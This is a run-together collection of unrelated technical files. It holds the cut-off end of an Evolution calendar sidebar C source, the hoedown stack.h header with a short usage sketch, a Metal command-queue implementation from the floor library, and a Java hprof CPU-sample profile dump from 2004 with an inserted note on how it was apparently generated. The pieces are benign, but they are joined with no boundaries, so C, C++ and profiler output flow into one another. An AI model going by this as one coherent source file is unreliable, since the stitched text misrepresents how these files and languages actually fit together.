        cal_base_shell_sidebar->priv->date_navigator) {
        g_signal_handler_disconnect (cal_base_shell_sidebar->priv->date_navigator,
            cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id);
        cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id = 0;
    }

    cal_base_shell_sidebar->priv->date_navigator = NULL;
    cal_base_shell_sidebar->priv->selector = NULL;
    cal_base_shell_sidebar->priv->paned = NULL;

    /* Chain up to parent's method. */
    G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->dispose (object);
}

static void
cal_base_shell_sidebar_finalize (GObject *object)
{
    ECalBaseShellSidebar *cal_base_shell_sidebar;

    cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object);

    g_hash_table_destroy (cal_base_shell_sidebar->priv->selected_uids);
    cal_base_shell_sidebar->priv->selected_uids = NULL;

    /* Chain up to parent's method. */
    G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->finalize (object);
}

static void
e_cal_base_shell_sidebar_class_init (ECalBaseShellSidebarClass *class)
{
    GObjectClass *object_class;
    EShellSidebarClass *shell_sidebar_class;

    g_type_class_add_private (class, sizeof (ECalBaseShellSidebarPrivate));

    object_class = G_OBJECT_CLASS (class);
    object_class->get_property = cal_base_shell_sidebar_get_property;
    object_class->constructed = cal_base_shell_sidebar_constructed;
    object_class->dispose = cal_base_shell_sidebar_dispose;
    object_class->finalize = cal_base_shell_sidebar_finalize;

    shell_sidebar_class = E_SHELL_SIDEBAR_CLASS (class);
    shell_sidebar_class->check_state = cal_base_shell_sidebar_check_state;

    g_object_class_install_property (
        object_class,
        PROP_SELECTOR,
        g_param_spec_object (
            "selector",
            "Source Selector Widget",
            "This widget displays groups of calendars",
            E_TYPE_SOURCE_SELECTOR,
            G_PARAM_READABLE));

    g_object_class_install_property (
        object_class,
        PROP_DATE_NAVIGATOR,
        g_param_spec_object (
            "date-navigator",
            "Date Navigator Widget",
            "This widget displays a miniature calendar",
            E_TYPE_CALENDAR,
            G_PARAM_READABLE));

    signals[CLIENT_OPENED] = g_signal_new (
        "client-opened",
        G_OBJECT_CLASS_TYPE (object_class),
        G_SIGNAL_RUN_LAST,
        G_STRUCT_OFFSET (ECalBaseShellSidebarClass, client_opened),
        NULL, NULL,
        g_cclosure_marshal_VOID__OBJECT,
        G_TYPE_NONE, 1,
        E_TYPE_CAL_CLIENT);

    signals[CLIENT_CLOSED] = g_signal_new (
        "client-closed",
        G_OBJECT_CLASS_TYPE (object_class),
        G_SIGNAL_RUN_LAST,
        G_STRUCT_OFFSET (ECalBaseShellSidebarClass, client_closed),
        NULL, NULL,
        g_cclosure_marshal_VOID__OBJECT,
        G_TYPE_NONE, 1,
        E_TYPE_SOURCE);
}

static void
e_cal_base_shell_sidebar_class_finalize (ECalBaseShellSidebarClass *class)
{
}

static void
e_cal_base_shell_sidebar_init (ECalBaseShellSidebar *cal_base_shell_sidebar)
{
    cal_base_shell_sidebar->priv = E_CAL_BASE_SHELL_SIDEBAR_GET_PRIVATE (cal_base_shell_sidebar);
    cal_base_shell_sidebar->priv->selected_uids =
        g_hash_table_new_full (g_str_hash, g_str_equal, g_free, cancel_and_unref);
}

void
e_cal_base_shell_sidebar_type_register (GTypeModule *type_module)
{
    /* XXX G_DEFINE_DYNAMIC_TYPE declares a static type registration
     * function, so we have to wrap it with a public function in
     * order to register types from a separate compilation unit. */
    e_cal_base_shell_sidebar_register_type (type_module);
}

GtkWidget *
e_cal_base_shell_sidebar_new (EShellView *shell_view)
{
    g_return_val_if_fail (E_IS_SHELL_VIEW (shell_view), NULL);

    return g_object_new (
        E_TYPE_CAL_BASE_SHELL_SIDEBAR,
        "shell-view", shell_view, NULL);
}

ECalendar *
e_cal_base_shell_sidebar_get_date_navigator (ECalBaseShellSidebar *cal_base_shell_sidebar)
{
    g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar), NULL);

    return cal_base_shell_sidebar->priv->date_navigator;
}

ESourceSelector *
e_cal_base_shell_sidebar_get_selector (ECalBaseShellSidebar *cal_base_shell_sidebar)
{
    g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar), NULL);

    return cal_base_shell_sidebar->priv->selector;
}

void
e_cal_base_shell_sidebar_ensure_sources_open (ECalBaseShellSidebar *cal_base_shell_sidebar)
{
    GList *selected, *link;
    ESourceSelector *selector;

    g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar));

    selector = cal_base_shell_sidebar->priv->selector;
    g_return_if_fail (E_IS_SOURCE_SELECTOR (selector));

    selected = e_source_selector_get_selection (selector);

    for (link = selected; link; link = g_list_next (link)) {
        ESource *source = link->data;

        e_cal_base_shell_sidebar_ensure_source_opened (cal_base_shell_sidebar, source);
    }

    g_list_free_full (selected, g_object_unref);
}
/* stack.h - simple stacking */

#ifndef HOEDOWN_STACK_H
#define HOEDOWN_STACK_H

#include <stddef.h>

#ifdef __cplusplus
extern "C" {
#endif


/*********
 * TYPES *
 *********/

struct hoedown_stack {
    void **item;
    size_t size;
    size_t asize;
};

typedef struct hoedown_stack hoedown_stack;


/*************
 * FUNCTIONS *
 *************/

/* hoedown_stack_init: initialize a stack */
void hoedown_stack_init(hoedown_stack *st, size_t initial_size);

/* hoedown_stack_uninit: free internal data of the stack */
void hoedown_stack_uninit(hoedown_stack *st);

/* hoedown_stack_grow: increase the allocated size to the given value */
void hoedown_stack_grow(hoedown_stack *st, size_t neosz);

/* hoedown_stack_push: push an item to the top of the stack */
void hoedown_stack_push(hoedown_stack *st, void *item);

/* hoedown_stack_pop: retrieve and remove the item at the top of the stack */
void *hoedown_stack_pop(hoedown_stack *st);

/* hoedown_stack_top: retrieve the item at the top of the stack */
void *hoedown_stack_top(const hoedown_stack *st);


#ifdef __cplusplus
}
#endif

#endif /** HOEDOWN_STACK_H **/
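/*
 * A minimal usage sketch for the API declared above (illustrative only, not
 * part of hoedown): it assumes, as the void return types suggest, that
 * allocation failures abort inside the library rather than being reported to
 * the caller.
 */
#include <stdio.h>
#include "stack.h"

int main(void) {
    hoedown_stack st;
    int a = 1, b = 2;

    /* start with room for 4 pointers; the stack grows as needed */
    hoedown_stack_init(&st, 4);

    hoedown_stack_push(&st, &a);
    hoedown_stack_push(&st, &b);

    /* top() peeks at the last item without removing it; pop() removes it */
    printf("top: %d\n", *(int *) hoedown_stack_top(&st)); /* prints 2 */
    printf("pop: %d\n", *(int *) hoedown_stack_pop(&st)); /* prints 2 */
    printf("pop: %d\n", *(int *) hoedown_stack_pop(&st)); /* prints 1 */

    /* frees the internal item array, not the pushed items themselves */
    hoedown_stack_uninit(&st);
    return 0;
}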
/*
 * Flo's Open libRary (floor)
 * Copyright (C) 2004 - 2020 Florian Ziesche
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; version 2 of the License only.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */

#include <floor/compute/metal/metal_queue.hpp>

#if !defined(FLOOR_NO_METAL)

#include <floor/darwin/darwin_helper.hpp>

// make GPUStartTime/GPUEndTime available everywhere
@protocol MTLCommandBufferProfiling <MTLCommandBuffer>
@property(readonly) double GPUEndTime;
@property(readonly) double GPUStartTime;
@end

metal_queue::metal_queue(const compute_device& device_, id <MTLCommandQueue> queue_) : compute_queue(device_), queue(queue_) {
    // check if we can do profiling
    id <MTLCommandBuffer> buffer = [queue commandBufferWithUnretainedReferences];
    __unsafe_unretained id <MTLCommandBufferProfiling> prof_buffer = (id <MTLCommandBufferProfiling>)buffer;
    if ([prof_buffer respondsToSelector:@selector(GPUStartTime)] &&
        [prof_buffer respondsToSelector:@selector(GPUEndTime)]) {
        can_do_profiling = true;
    }
    buffer = nil;
}

void metal_queue::finish() const {
    // need to copy current set of command buffers, so we don't deadlock when removing completed command buffers
    decltype(cmd_buffers) cur_cmd_buffers;
    {
        GUARD(cmd_buffers_lock);
        cur_cmd_buffers = cmd_buffers;
    }
    for(const auto& cmd_buffer : cur_cmd_buffers) {
        [cmd_buffer.first waitUntilCompleted];
    }
}

void metal_queue::flush() const {
    // need to copy current set of command buffers, so we don't deadlock when removing completed command buffers
    decltype(cmd_buffers) cur_cmd_buffers;
    {
        GUARD(cmd_buffers_lock);
        cur_cmd_buffers = cmd_buffers;
    }
    for(const auto& cmd_buffer : cur_cmd_buffers) {
        [cmd_buffer.first waitUntilScheduled];
    }
}

const void* metal_queue::get_queue_ptr() const {
    return (__bridge const void*)queue;
}

void* metal_queue::get_queue_ptr() {
    return (__bridge void*)queue;
}

id <MTLCommandQueue> metal_queue::get_queue() const {
    return queue;
}

id <MTLCommandBuffer> metal_queue::make_command_buffer() const {
    id <MTLCommandBuffer> cmd_buffer = [queue commandBufferWithUnretainedReferences];
    [cmd_buffer addCompletedHandler:^(id <MTLCommandBuffer> buffer) {
        GUARD(cmd_buffers_lock);
        const auto iter = find_if(cbegin(cmd_buffers), cend(cmd_buffers),
                                  [&buffer](const decltype(cmd_buffers)::value_type& elem) {
            return (elem.first == buffer);
        });
        if(iter == cend(cmd_buffers)) {
            log_error("failed to find metal command buffer %X!", buffer);
            return;
        }

        if (iter->second && can_do_profiling) {
            __unsafe_unretained id <MTLCommandBufferProfiling> prof_buffer = (id <MTLCommandBufferProfiling>)buffer;
            const auto elapsed_time = ([prof_buffer GPUEndTime] - [prof_buffer GPUStartTime]);
            profiling_sum += uint64_t(elapsed_time * 1000000.0);
        }
        // else: nothing to do here

        cmd_buffers.erase(iter);
    }];
    {
        GUARD(cmd_buffers_lock);
        cmd_buffers.emplace_back(cmd_buffer, is_profiling);
    }
    return cmd_buffer;
}

void metal_queue::start_profiling() {
    if (!can_do_profiling) {
        // fallback to host side profiling
        compute_queue::start_profiling();
        return;
    }

    // signal new buffers that we're profiling
    is_profiling = true;
}

uint64_t metal_queue::stop_profiling() {
    if (!can_do_profiling) {
        // fallback to host side profiling
        return compute_queue::stop_profiling();
    }

    // wait on all buffers
    finish();

    const uint64_t ret = profiling_sum;

    // clear
    profiling_sum = 0;
    is_profiling = false;

    return ret;
}

#endif
JAVA PROFILE 1.0.1, created Thu Jul 22 14:15:03 2004

Header for -Xhprof ASCII Output

Copyright 1998 Sun Microsystems, Inc. 901 San Antonio Road, Palo Alto,
California, 94303, U.S.A. All Rights Reserved.

WARNING! This file format is under development, and is subject to change
without notice.

This file contains the following types of records:

THREAD START
THREAD END      mark the lifetime of Java threads

TRACE           represents a Java stack trace. Each trace consists of a series
                of stack frames. Other records refer to TRACEs to identify
                (1) where object allocations have taken place, (2) the frames
                in which GC roots were found, and (3) frequently executed
                methods.

HEAP DUMP       is a complete snapshot of all live objects in the Java heap.
                Following distinctions are made:

                ROOT    root set as determined by GC
                CLS     classes
                OBJ     instances
                ARR     arrays

SITES           is a sorted list of allocation sites. This identifies the most
                heavily allocated object types, and the TRACE at which those
                allocations occurred.

CPU SAMPLES     is a statistical profile of program execution. The VM
                periodically samples all running threads, and assigns a
                quantum to active TRACEs in those threads. Entries in this
                record are TRACEs ranked by the percentage of total quanta
                they consumed; top-ranked TRACEs are typically hot spots in
                the program.

CPU TIME        is a profile of program execution obtained by measuring the
                time spent in individual methods (excluding the time spent in
                callees), as well as by counting the number of times each
                method is called. Entries in this record are TRACEs ranked by
                the percentage of total CPU time. The "count" field indicates
                the number of times each TRACE is invoked.

MONITOR TIME    is a profile of monitor contention obtained by measuring the
                time spent by a thread waiting to enter a monitor. Entries in
                this record are TRACEs ranked by the percentage of total
                monitor contention time and a brief description of the
                monitor. The "count" field indicates the number of times the
                monitor was contended at that TRACE.

MONITOR DUMP    is a complete snapshot of all the monitors and threads in the
                System.

HEAP DUMP, SITES, CPU SAMPLES|TIME and MONITOR DUMP|TIME records are generated
at program exit. They can also be obtained during program execution by typing
Ctrl-\ (on Solaris) or by typing Ctrl-Break (on Win32).
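A dump like this one is produced by the hprof profiling agent that shipped
with JDKs of this era. Judging from the Lesson11.main frames and the
four-frame TRACE records below, a plausible invocation would have been
something like the following (the exact option string is an assumption; it is
not recorded in the file itself):

    java -Xrunhprof:cpu=samples,depth=4 Lesson11

Here cpu=samples requests the statistical CPU SAMPLES record described above,
depth=4 limits each TRACE to four stack frames, and the output goes to the
default java.hprof.txt.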
-------- THREAD START (obj=2b570f0, id = 1, name="Finalizer", group="system") THREAD START (obj=2b571f8, id = 2, name="Reference Handler", group="system") THREAD START (obj=2b572d8, id = 3, name="main", group="main") THREAD START (obj=2b5a030, id = 4, name="HPROF CPU profiler", group="system") THREAD START (obj=2b5a138, id = 5, name="Signal Dispatcher", group="system") THREAD START (obj=2d04630, id = 6, name="AWT-Shutdown", group="main") THREAD START (obj=2d05160, id = 7, name="AWT-Windows", group="main") THREAD START (obj=2d10698, id = 8, name="Image Fetcher 0", group="main") THREAD START (obj=2d38b80, id = 9, name="Java2D Disposer", group="main") THREAD END (id = 6) THREAD END (id = 3) THREAD START (obj=2b57320, id = 10, name="DestroyJavaVM", group="main") THREAD END (id = 10) TRACE 5: <empty> TRACE 17: java.util.zip.Inflater.inflate(<Unknown>:Unknown line) java.util.zip.InflaterInputStream.read(<Unknown>:Unknown line) sun.misc.Resource.getBytes(<Unknown>:Unknown line) java.net.URLClassLoader.defineClass(<Unknown>:Unknown line) TRACE 10: org.lwjgl.opengl.Window.<clinit>(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) Lesson11.init(Lesson11.java:184) Lesson11.run(Lesson11.java:68) TRACE 24: org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) TRACE 9: sun.nio.cs.UTF_8.newDecoder(<Unknown>:Unknown line) java.lang.StringCoding$CharsetSD.<init>(<Unknown>:Unknown line) java.lang.StringCoding$CharsetSD.<init>(<Unknown>:Unknown line) java.lang.StringCoding.decode(<Unknown>:Unknown line) TRACE 21: org.lwjgl.opengl.Util.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) TRACE 63: org.lwjgl.Display.init(<Unknown>:Native method) org.lwjgl.Display.<clinit>(<Unknown>:Unknown line) Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) TRACE 45: sun.awt.SunToolkit.getPrivateKey(<Unknown>:Native method) sun.awt.SunToolkit.insertTargetMapping(<Unknown>:Unknown line) java.awt.Component.<init>(<Unknown>:Unknown line) javax.swing.ImageIcon$1.<init>(<Unknown>:Unknown line) TRACE 3: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.getResource(<Unknown>:Unknown line) sun.misc.URLClassPath.getResource(<Unknown>:Unknown line) TRACE 71: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) Lesson11.render(Lesson11.java:136) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 25: org.lwjgl.input.Mouse.nCreate(<Unknown>:Native method) org.lwjgl.input.Mouse.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 20: org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) TRACE 1: java.util.zip.ZipFile.open(<Unknown>:Native method) java.util.zip.ZipFile.<init>(<Unknown>:Unknown line) java.util.jar.JarFile.<init>(<Unknown>:Unknown line) java.util.jar.JarFile.<init>(<Unknown>:Unknown line) TRACE 74: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) 
Lesson11.render(Lesson11.java:142) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 59: sun.awt.image.ByteComponentRaster.<init>(<Unknown>:Unknown line) sun.awt.image.ByteInterleavedRaster.<init>(<Unknown>:Unknown line) sun.awt.image.ByteInterleavedRaster.<init>(<Unknown>:Unknown line) java.awt.image.Raster.createInterleavedRaster(<Unknown>:Unknown line) TRACE 23: org.lwjgl.opengl.GL11.nglGetIntegerv(<Unknown>:Native method) org.lwjgl.opengl.GL11.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.Util.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) TRACE 56: sun.awt.SunToolkit.getImageFromHash(<Unknown>:Unknown line) sun.awt.SunToolkit.getImage(<Unknown>:Unknown line) javax.swing.ImageIcon.<init>(<Unknown>:Unknown line) javax.swing.ImageIcon.<init>(<Unknown>:Unknown line) TRACE 44: java.lang.String.substring(<Unknown>:Unknown line) java.io.Win32FileSystem.parentOrNull(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) TRACE 15: org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 76: org.lwjgl.opengl.GL11.glClear(<Unknown>:Native method) Lesson11.render(Lesson11.java:116) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 12: org.lwjgl.Sys.initialize(<Unknown>:Unknown line) org.lwjgl.Sys.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.Window.<clinit>(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) TRACE 11: java.lang.String.lastIndexOf(<Unknown>:Unknown line) java.lang.String.lastIndexOf(<Unknown>:Unknown line) java.net.URLClassLoader.defineClass(<Unknown>:Unknown line) java.net.URLClassLoader.access$100(<Unknown>:Unknown line) TRACE 50: sun.awt.windows.Win32SurfaceData.initDDraw(<Unknown>:Native method) sun.awt.windows.Win32SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.D3DBlitLoops.register(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 26: java.util.HashMap.addEntry(<Unknown>:Unknown line) java.util.HashMap.put(<Unknown>:Unknown line) org.lwjgl.input.Keyboard.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) TRACE 79: org.lwjgl.opengl.Window.nDestroy(<Unknown>:Native method) org.lwjgl.opengl.Window.destroy(<Unknown>:Unknown line) Lesson11.cleanup(Lesson11.java:222) Lesson11.run(Lesson11.java:74) TRACE 69: Lesson11.render(Lesson11.java:135) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 78: org.lwjgl.input.Mouse.nDestroy(<Unknown>:Native method) org.lwjgl.input.Mouse.destroy(<Unknown>:Unknown line) org.lwjgl.opengl.Window.destroy(<Unknown>:Unknown line) Lesson11.cleanup(Lesson11.java:222) TRACE 16: org.lwjgl.opengl.GLContext.init(<Unknown>:Native method) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) TRACE 72: org.lwjgl.input.Mouse.nPoll(<Unknown>:Native method) org.lwjgl.input.Mouse.poll(<Unknown>:Unknown line) org.lwjgl.opengl.Window.update(<Unknown>:Unknown line) Lesson11.run(Lesson11.java:72) TRACE 61: sun.awt.image.ImagingLib.transformBI(<Unknown>:Native method) sun.awt.image.ImagingLib.filter(<Unknown>:Unknown line) 
java.awt.image.AffineTransformOp.filter(<Unknown>:Unknown line) Lesson11.loadTexture(Lesson11.java:238) TRACE 58: sun.java2d.Disposer.initIDs(<Unknown>:Native method) sun.java2d.Disposer.<clinit>(<Unknown>:Unknown line) sun.awt.image.BufImgSurfaceData.initRaster(<Unknown>:Native method) sun.awt.image.BufImgSurfaceData.createDataBC(<Unknown>:Unknown line) TRACE 46: sun.java2d.SurfaceData.initIDs(<Unknown>:Native method) sun.java2d.SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.WToolkit.initIDs(<Unknown>:Native method) sun.awt.windows.WToolkit.<clinit>(<Unknown>:Unknown line) TRACE 31: sun.awt.Win32GraphicsEnvironment.registerFontWithPlatform(<Unknown>:Native method) sun.awt.Win32GraphicsEnvironment.registerFontsWithPlatform(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) TRACE 35: sun.nio.cs.ISO_8859_1$Decoder.decodeArrayLoop(<Unknown>:Unknown line) sun.nio.cs.ISO_8859_1$Decoder.decodeLoop(<Unknown>:Unknown line) java.nio.charset.CharsetDecoder.decode(<Unknown>:Unknown line) sun.nio.cs.StreamDecoder$CharsetSD.implRead(<Unknown>:Unknown line) TRACE 53: sun.awt.windows.WToolkit.eventLoop(<Unknown>:Native method) sun.awt.windows.WToolkit.run(<Unknown>:Unknown line) java.lang.Thread.run(<Unknown>:Unknown line) TRACE 49: sun.awt.windows.Win32SurfaceData.initIDs(<Unknown>:Native method) sun.awt.windows.Win32SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.D3DBlitLoops.register(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 32: java.lang.StringBuffer.expandCapacity(<Unknown>:Unknown line) java.lang.StringBuffer.append(<Unknown>:Unknown line) java.io.Win32FileSystem.resolve(<Unknown>:Unknown line) java.io.File.<init>(<Unknown>:Unknown line) TRACE 4: java.io.FileInputStream.open(<Unknown>:Native method) java.io.FileInputStream.<init>(<Unknown>:Unknown line) sun.misc.URLClassPath$7.getInputStream(<Unknown>:Unknown line) sun.misc.Resource.getBytes(<Unknown>:Unknown line) TRACE 43: java.io.Win32FileSystem.normalize(<Unknown>:Unknown line) java.io.File.<init>(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) TRACE 33: sun.awt.FontProperties.initializeProperties(<Unknown>:Unknown line) sun.awt.FontProperties.<init>(<Unknown>:Unknown line) sun.awt.windows.WFontProperties.<init>(<Unknown>:Unknown line) sun.awt.Win32GraphicsEnvironment.createFontProperties(<Unknown>:Unknown line) TRACE 42: java.lang.StringBuffer.<init>(<Unknown>:Unknown line) java.lang.StringBuffer.<init>(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) TRACE 55: sun.awt.Win32GraphicsDevice.initIDs(<Unknown>:Native method) sun.awt.Win32GraphicsDevice.<clinit>(<Unknown>:Unknown line) sun.awt.Win32GraphicsEnvironment.makeScreenDevice(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.getScreenDevices(<Unknown>:Unknown line) TRACE 73: org.lwjgl.opengl.GL11.glTexCoord2f(<Unknown>:Native method) Lesson11.render(Lesson11.java:144) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 39: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) 
TRACE 37: sun.awt.font.NativeFontWrapper.registerFonts(<Unknown>:Native method) sun.java2d.SunGraphicsEnvironment.addPathFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.access$200(<Unknown>:Unknown line) TRACE 52: sun.awt.windows.WToolkit.init(<Unknown>:Native method) sun.awt.windows.WToolkit.run(<Unknown>:Unknown line) java.lang.Thread.run(<Unknown>:Unknown line) TRACE 13: java.lang.ClassLoader$NativeLibrary.load(<Unknown>:Native method) java.lang.ClassLoader.loadLibrary0(<Unknown>:Unknown line) java.lang.ClassLoader.loadLibrary(<Unknown>:Unknown line) java.lang.Runtime.loadLibrary0(<Unknown>:Unknown line) TRACE 62: Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) Lesson11.run(Lesson11.java:68) Lesson11.main(Lesson11.java:63) TRACE 57: sun.awt.image.ImageFetcher.fetchloop(<Unknown>:Unknown line) sun.awt.image.ImageFetcher.run(<Unknown>:Unknown line) TRACE 68: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) Lesson11.render(Lesson11.java:145) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 47: java.lang.Class.forName0(<Unknown>:Native method) java.lang.Class.forName(<Unknown>:Unknown line) sun.java2d.loops.GraphicsPrimitiveMgr.class$(<Unknown>:Unknown line) sun.java2d.loops.GraphicsPrimitiveMgr.<clinit>(<Unknown>:Unknown line) TRACE 77: org.lwjgl.opengl.GL11.glLoadIdentity(<Unknown>:Native method) Lesson11.render(Lesson11.java:117) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 41: sun.awt.font.NativeFontWrapper.registerFonts(<Unknown>:Native method) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.initTerminalNames(<Unknown>:Unknown line) TRACE 40: java.io.WinNTFileSystem.checkAccess(<Unknown>:Native method) java.io.File.canRead(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) TRACE 64: org.lwjgl.opengl.GL11.nglTexImage2D(<Unknown>:Native method) org.lwjgl.opengl.GL11.glTexImage2D(<Unknown>:Unknown line) Lesson11.loadTexture(Lesson11.java:259) Lesson11.loadTextures(Lesson11.java:201) TRACE 36: java.io.WinNTFileSystem.canonicalize0(<Unknown>:Native method) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.addPathFonts(<Unknown>:Unknown line) TRACE 51: sun.awt.windows.WToolkit.initIDs(<Unknown>:Native method) sun.awt.windows.WToolkit.<clinit>(<Unknown>:Unknown line) java.lang.Class.forName0(<Unknown>:Native method) java.lang.Class.forName(<Unknown>:Unknown line) TRACE 6: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.FileURLMapper.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$JarLoader.getJarFile(<Unknown>:Unknown line) TRACE 8: Lesson11.createWindow(Lesson11.java:180) Lesson11.init(Lesson11.java:184) Lesson11.run(Lesson11.java:68) Lesson11.main(Lesson11.java:63) TRACE 7: java.util.zip.ZipFile.getInputStream(<Unknown>:Unknown line) java.util.zip.ZipFile.getInputStream(<Unknown>:Unknown line) java.util.jar.JarFile.hasClassPathAttribute(<Unknown>:Unknown line) java.util.jar.JavaUtilJarAccessImpl.jarFileHasClassPathAttribute(<Unknown>:Unknown line) TRACE 67: 
Lesson11.render(Lesson11.java:136) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 70: Lesson11.render(Lesson11.java:142) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 30: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.getResource(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.findResource(<Unknown>:Unknown line) TRACE 34: sun.awt.SunToolkit.<clinit>(<Unknown>:Unknown line) sun.awt.FontProperties.initializeProperties(<Unknown>:Unknown line) sun.awt.FontProperties.<init>(<Unknown>:Unknown line) sun.awt.windows.WFontProperties.<init>(<Unknown>:Unknown line) TRACE 14: org.lwjgl.opengl.Window.nCreate(<Unknown>:Native method) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 48: sun.java2d.loops.GraphicsPrimitiveMgr.initIDs(<Unknown>:Native method) sun.java2d.loops.GraphicsPrimitiveMgr.<clinit>(<Unknown>:Unknown line) sun.java2d.loops.Blit.<clinit>(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 38: sun.java2d.SunGraphicsEnvironment.registerFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.access$200(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) 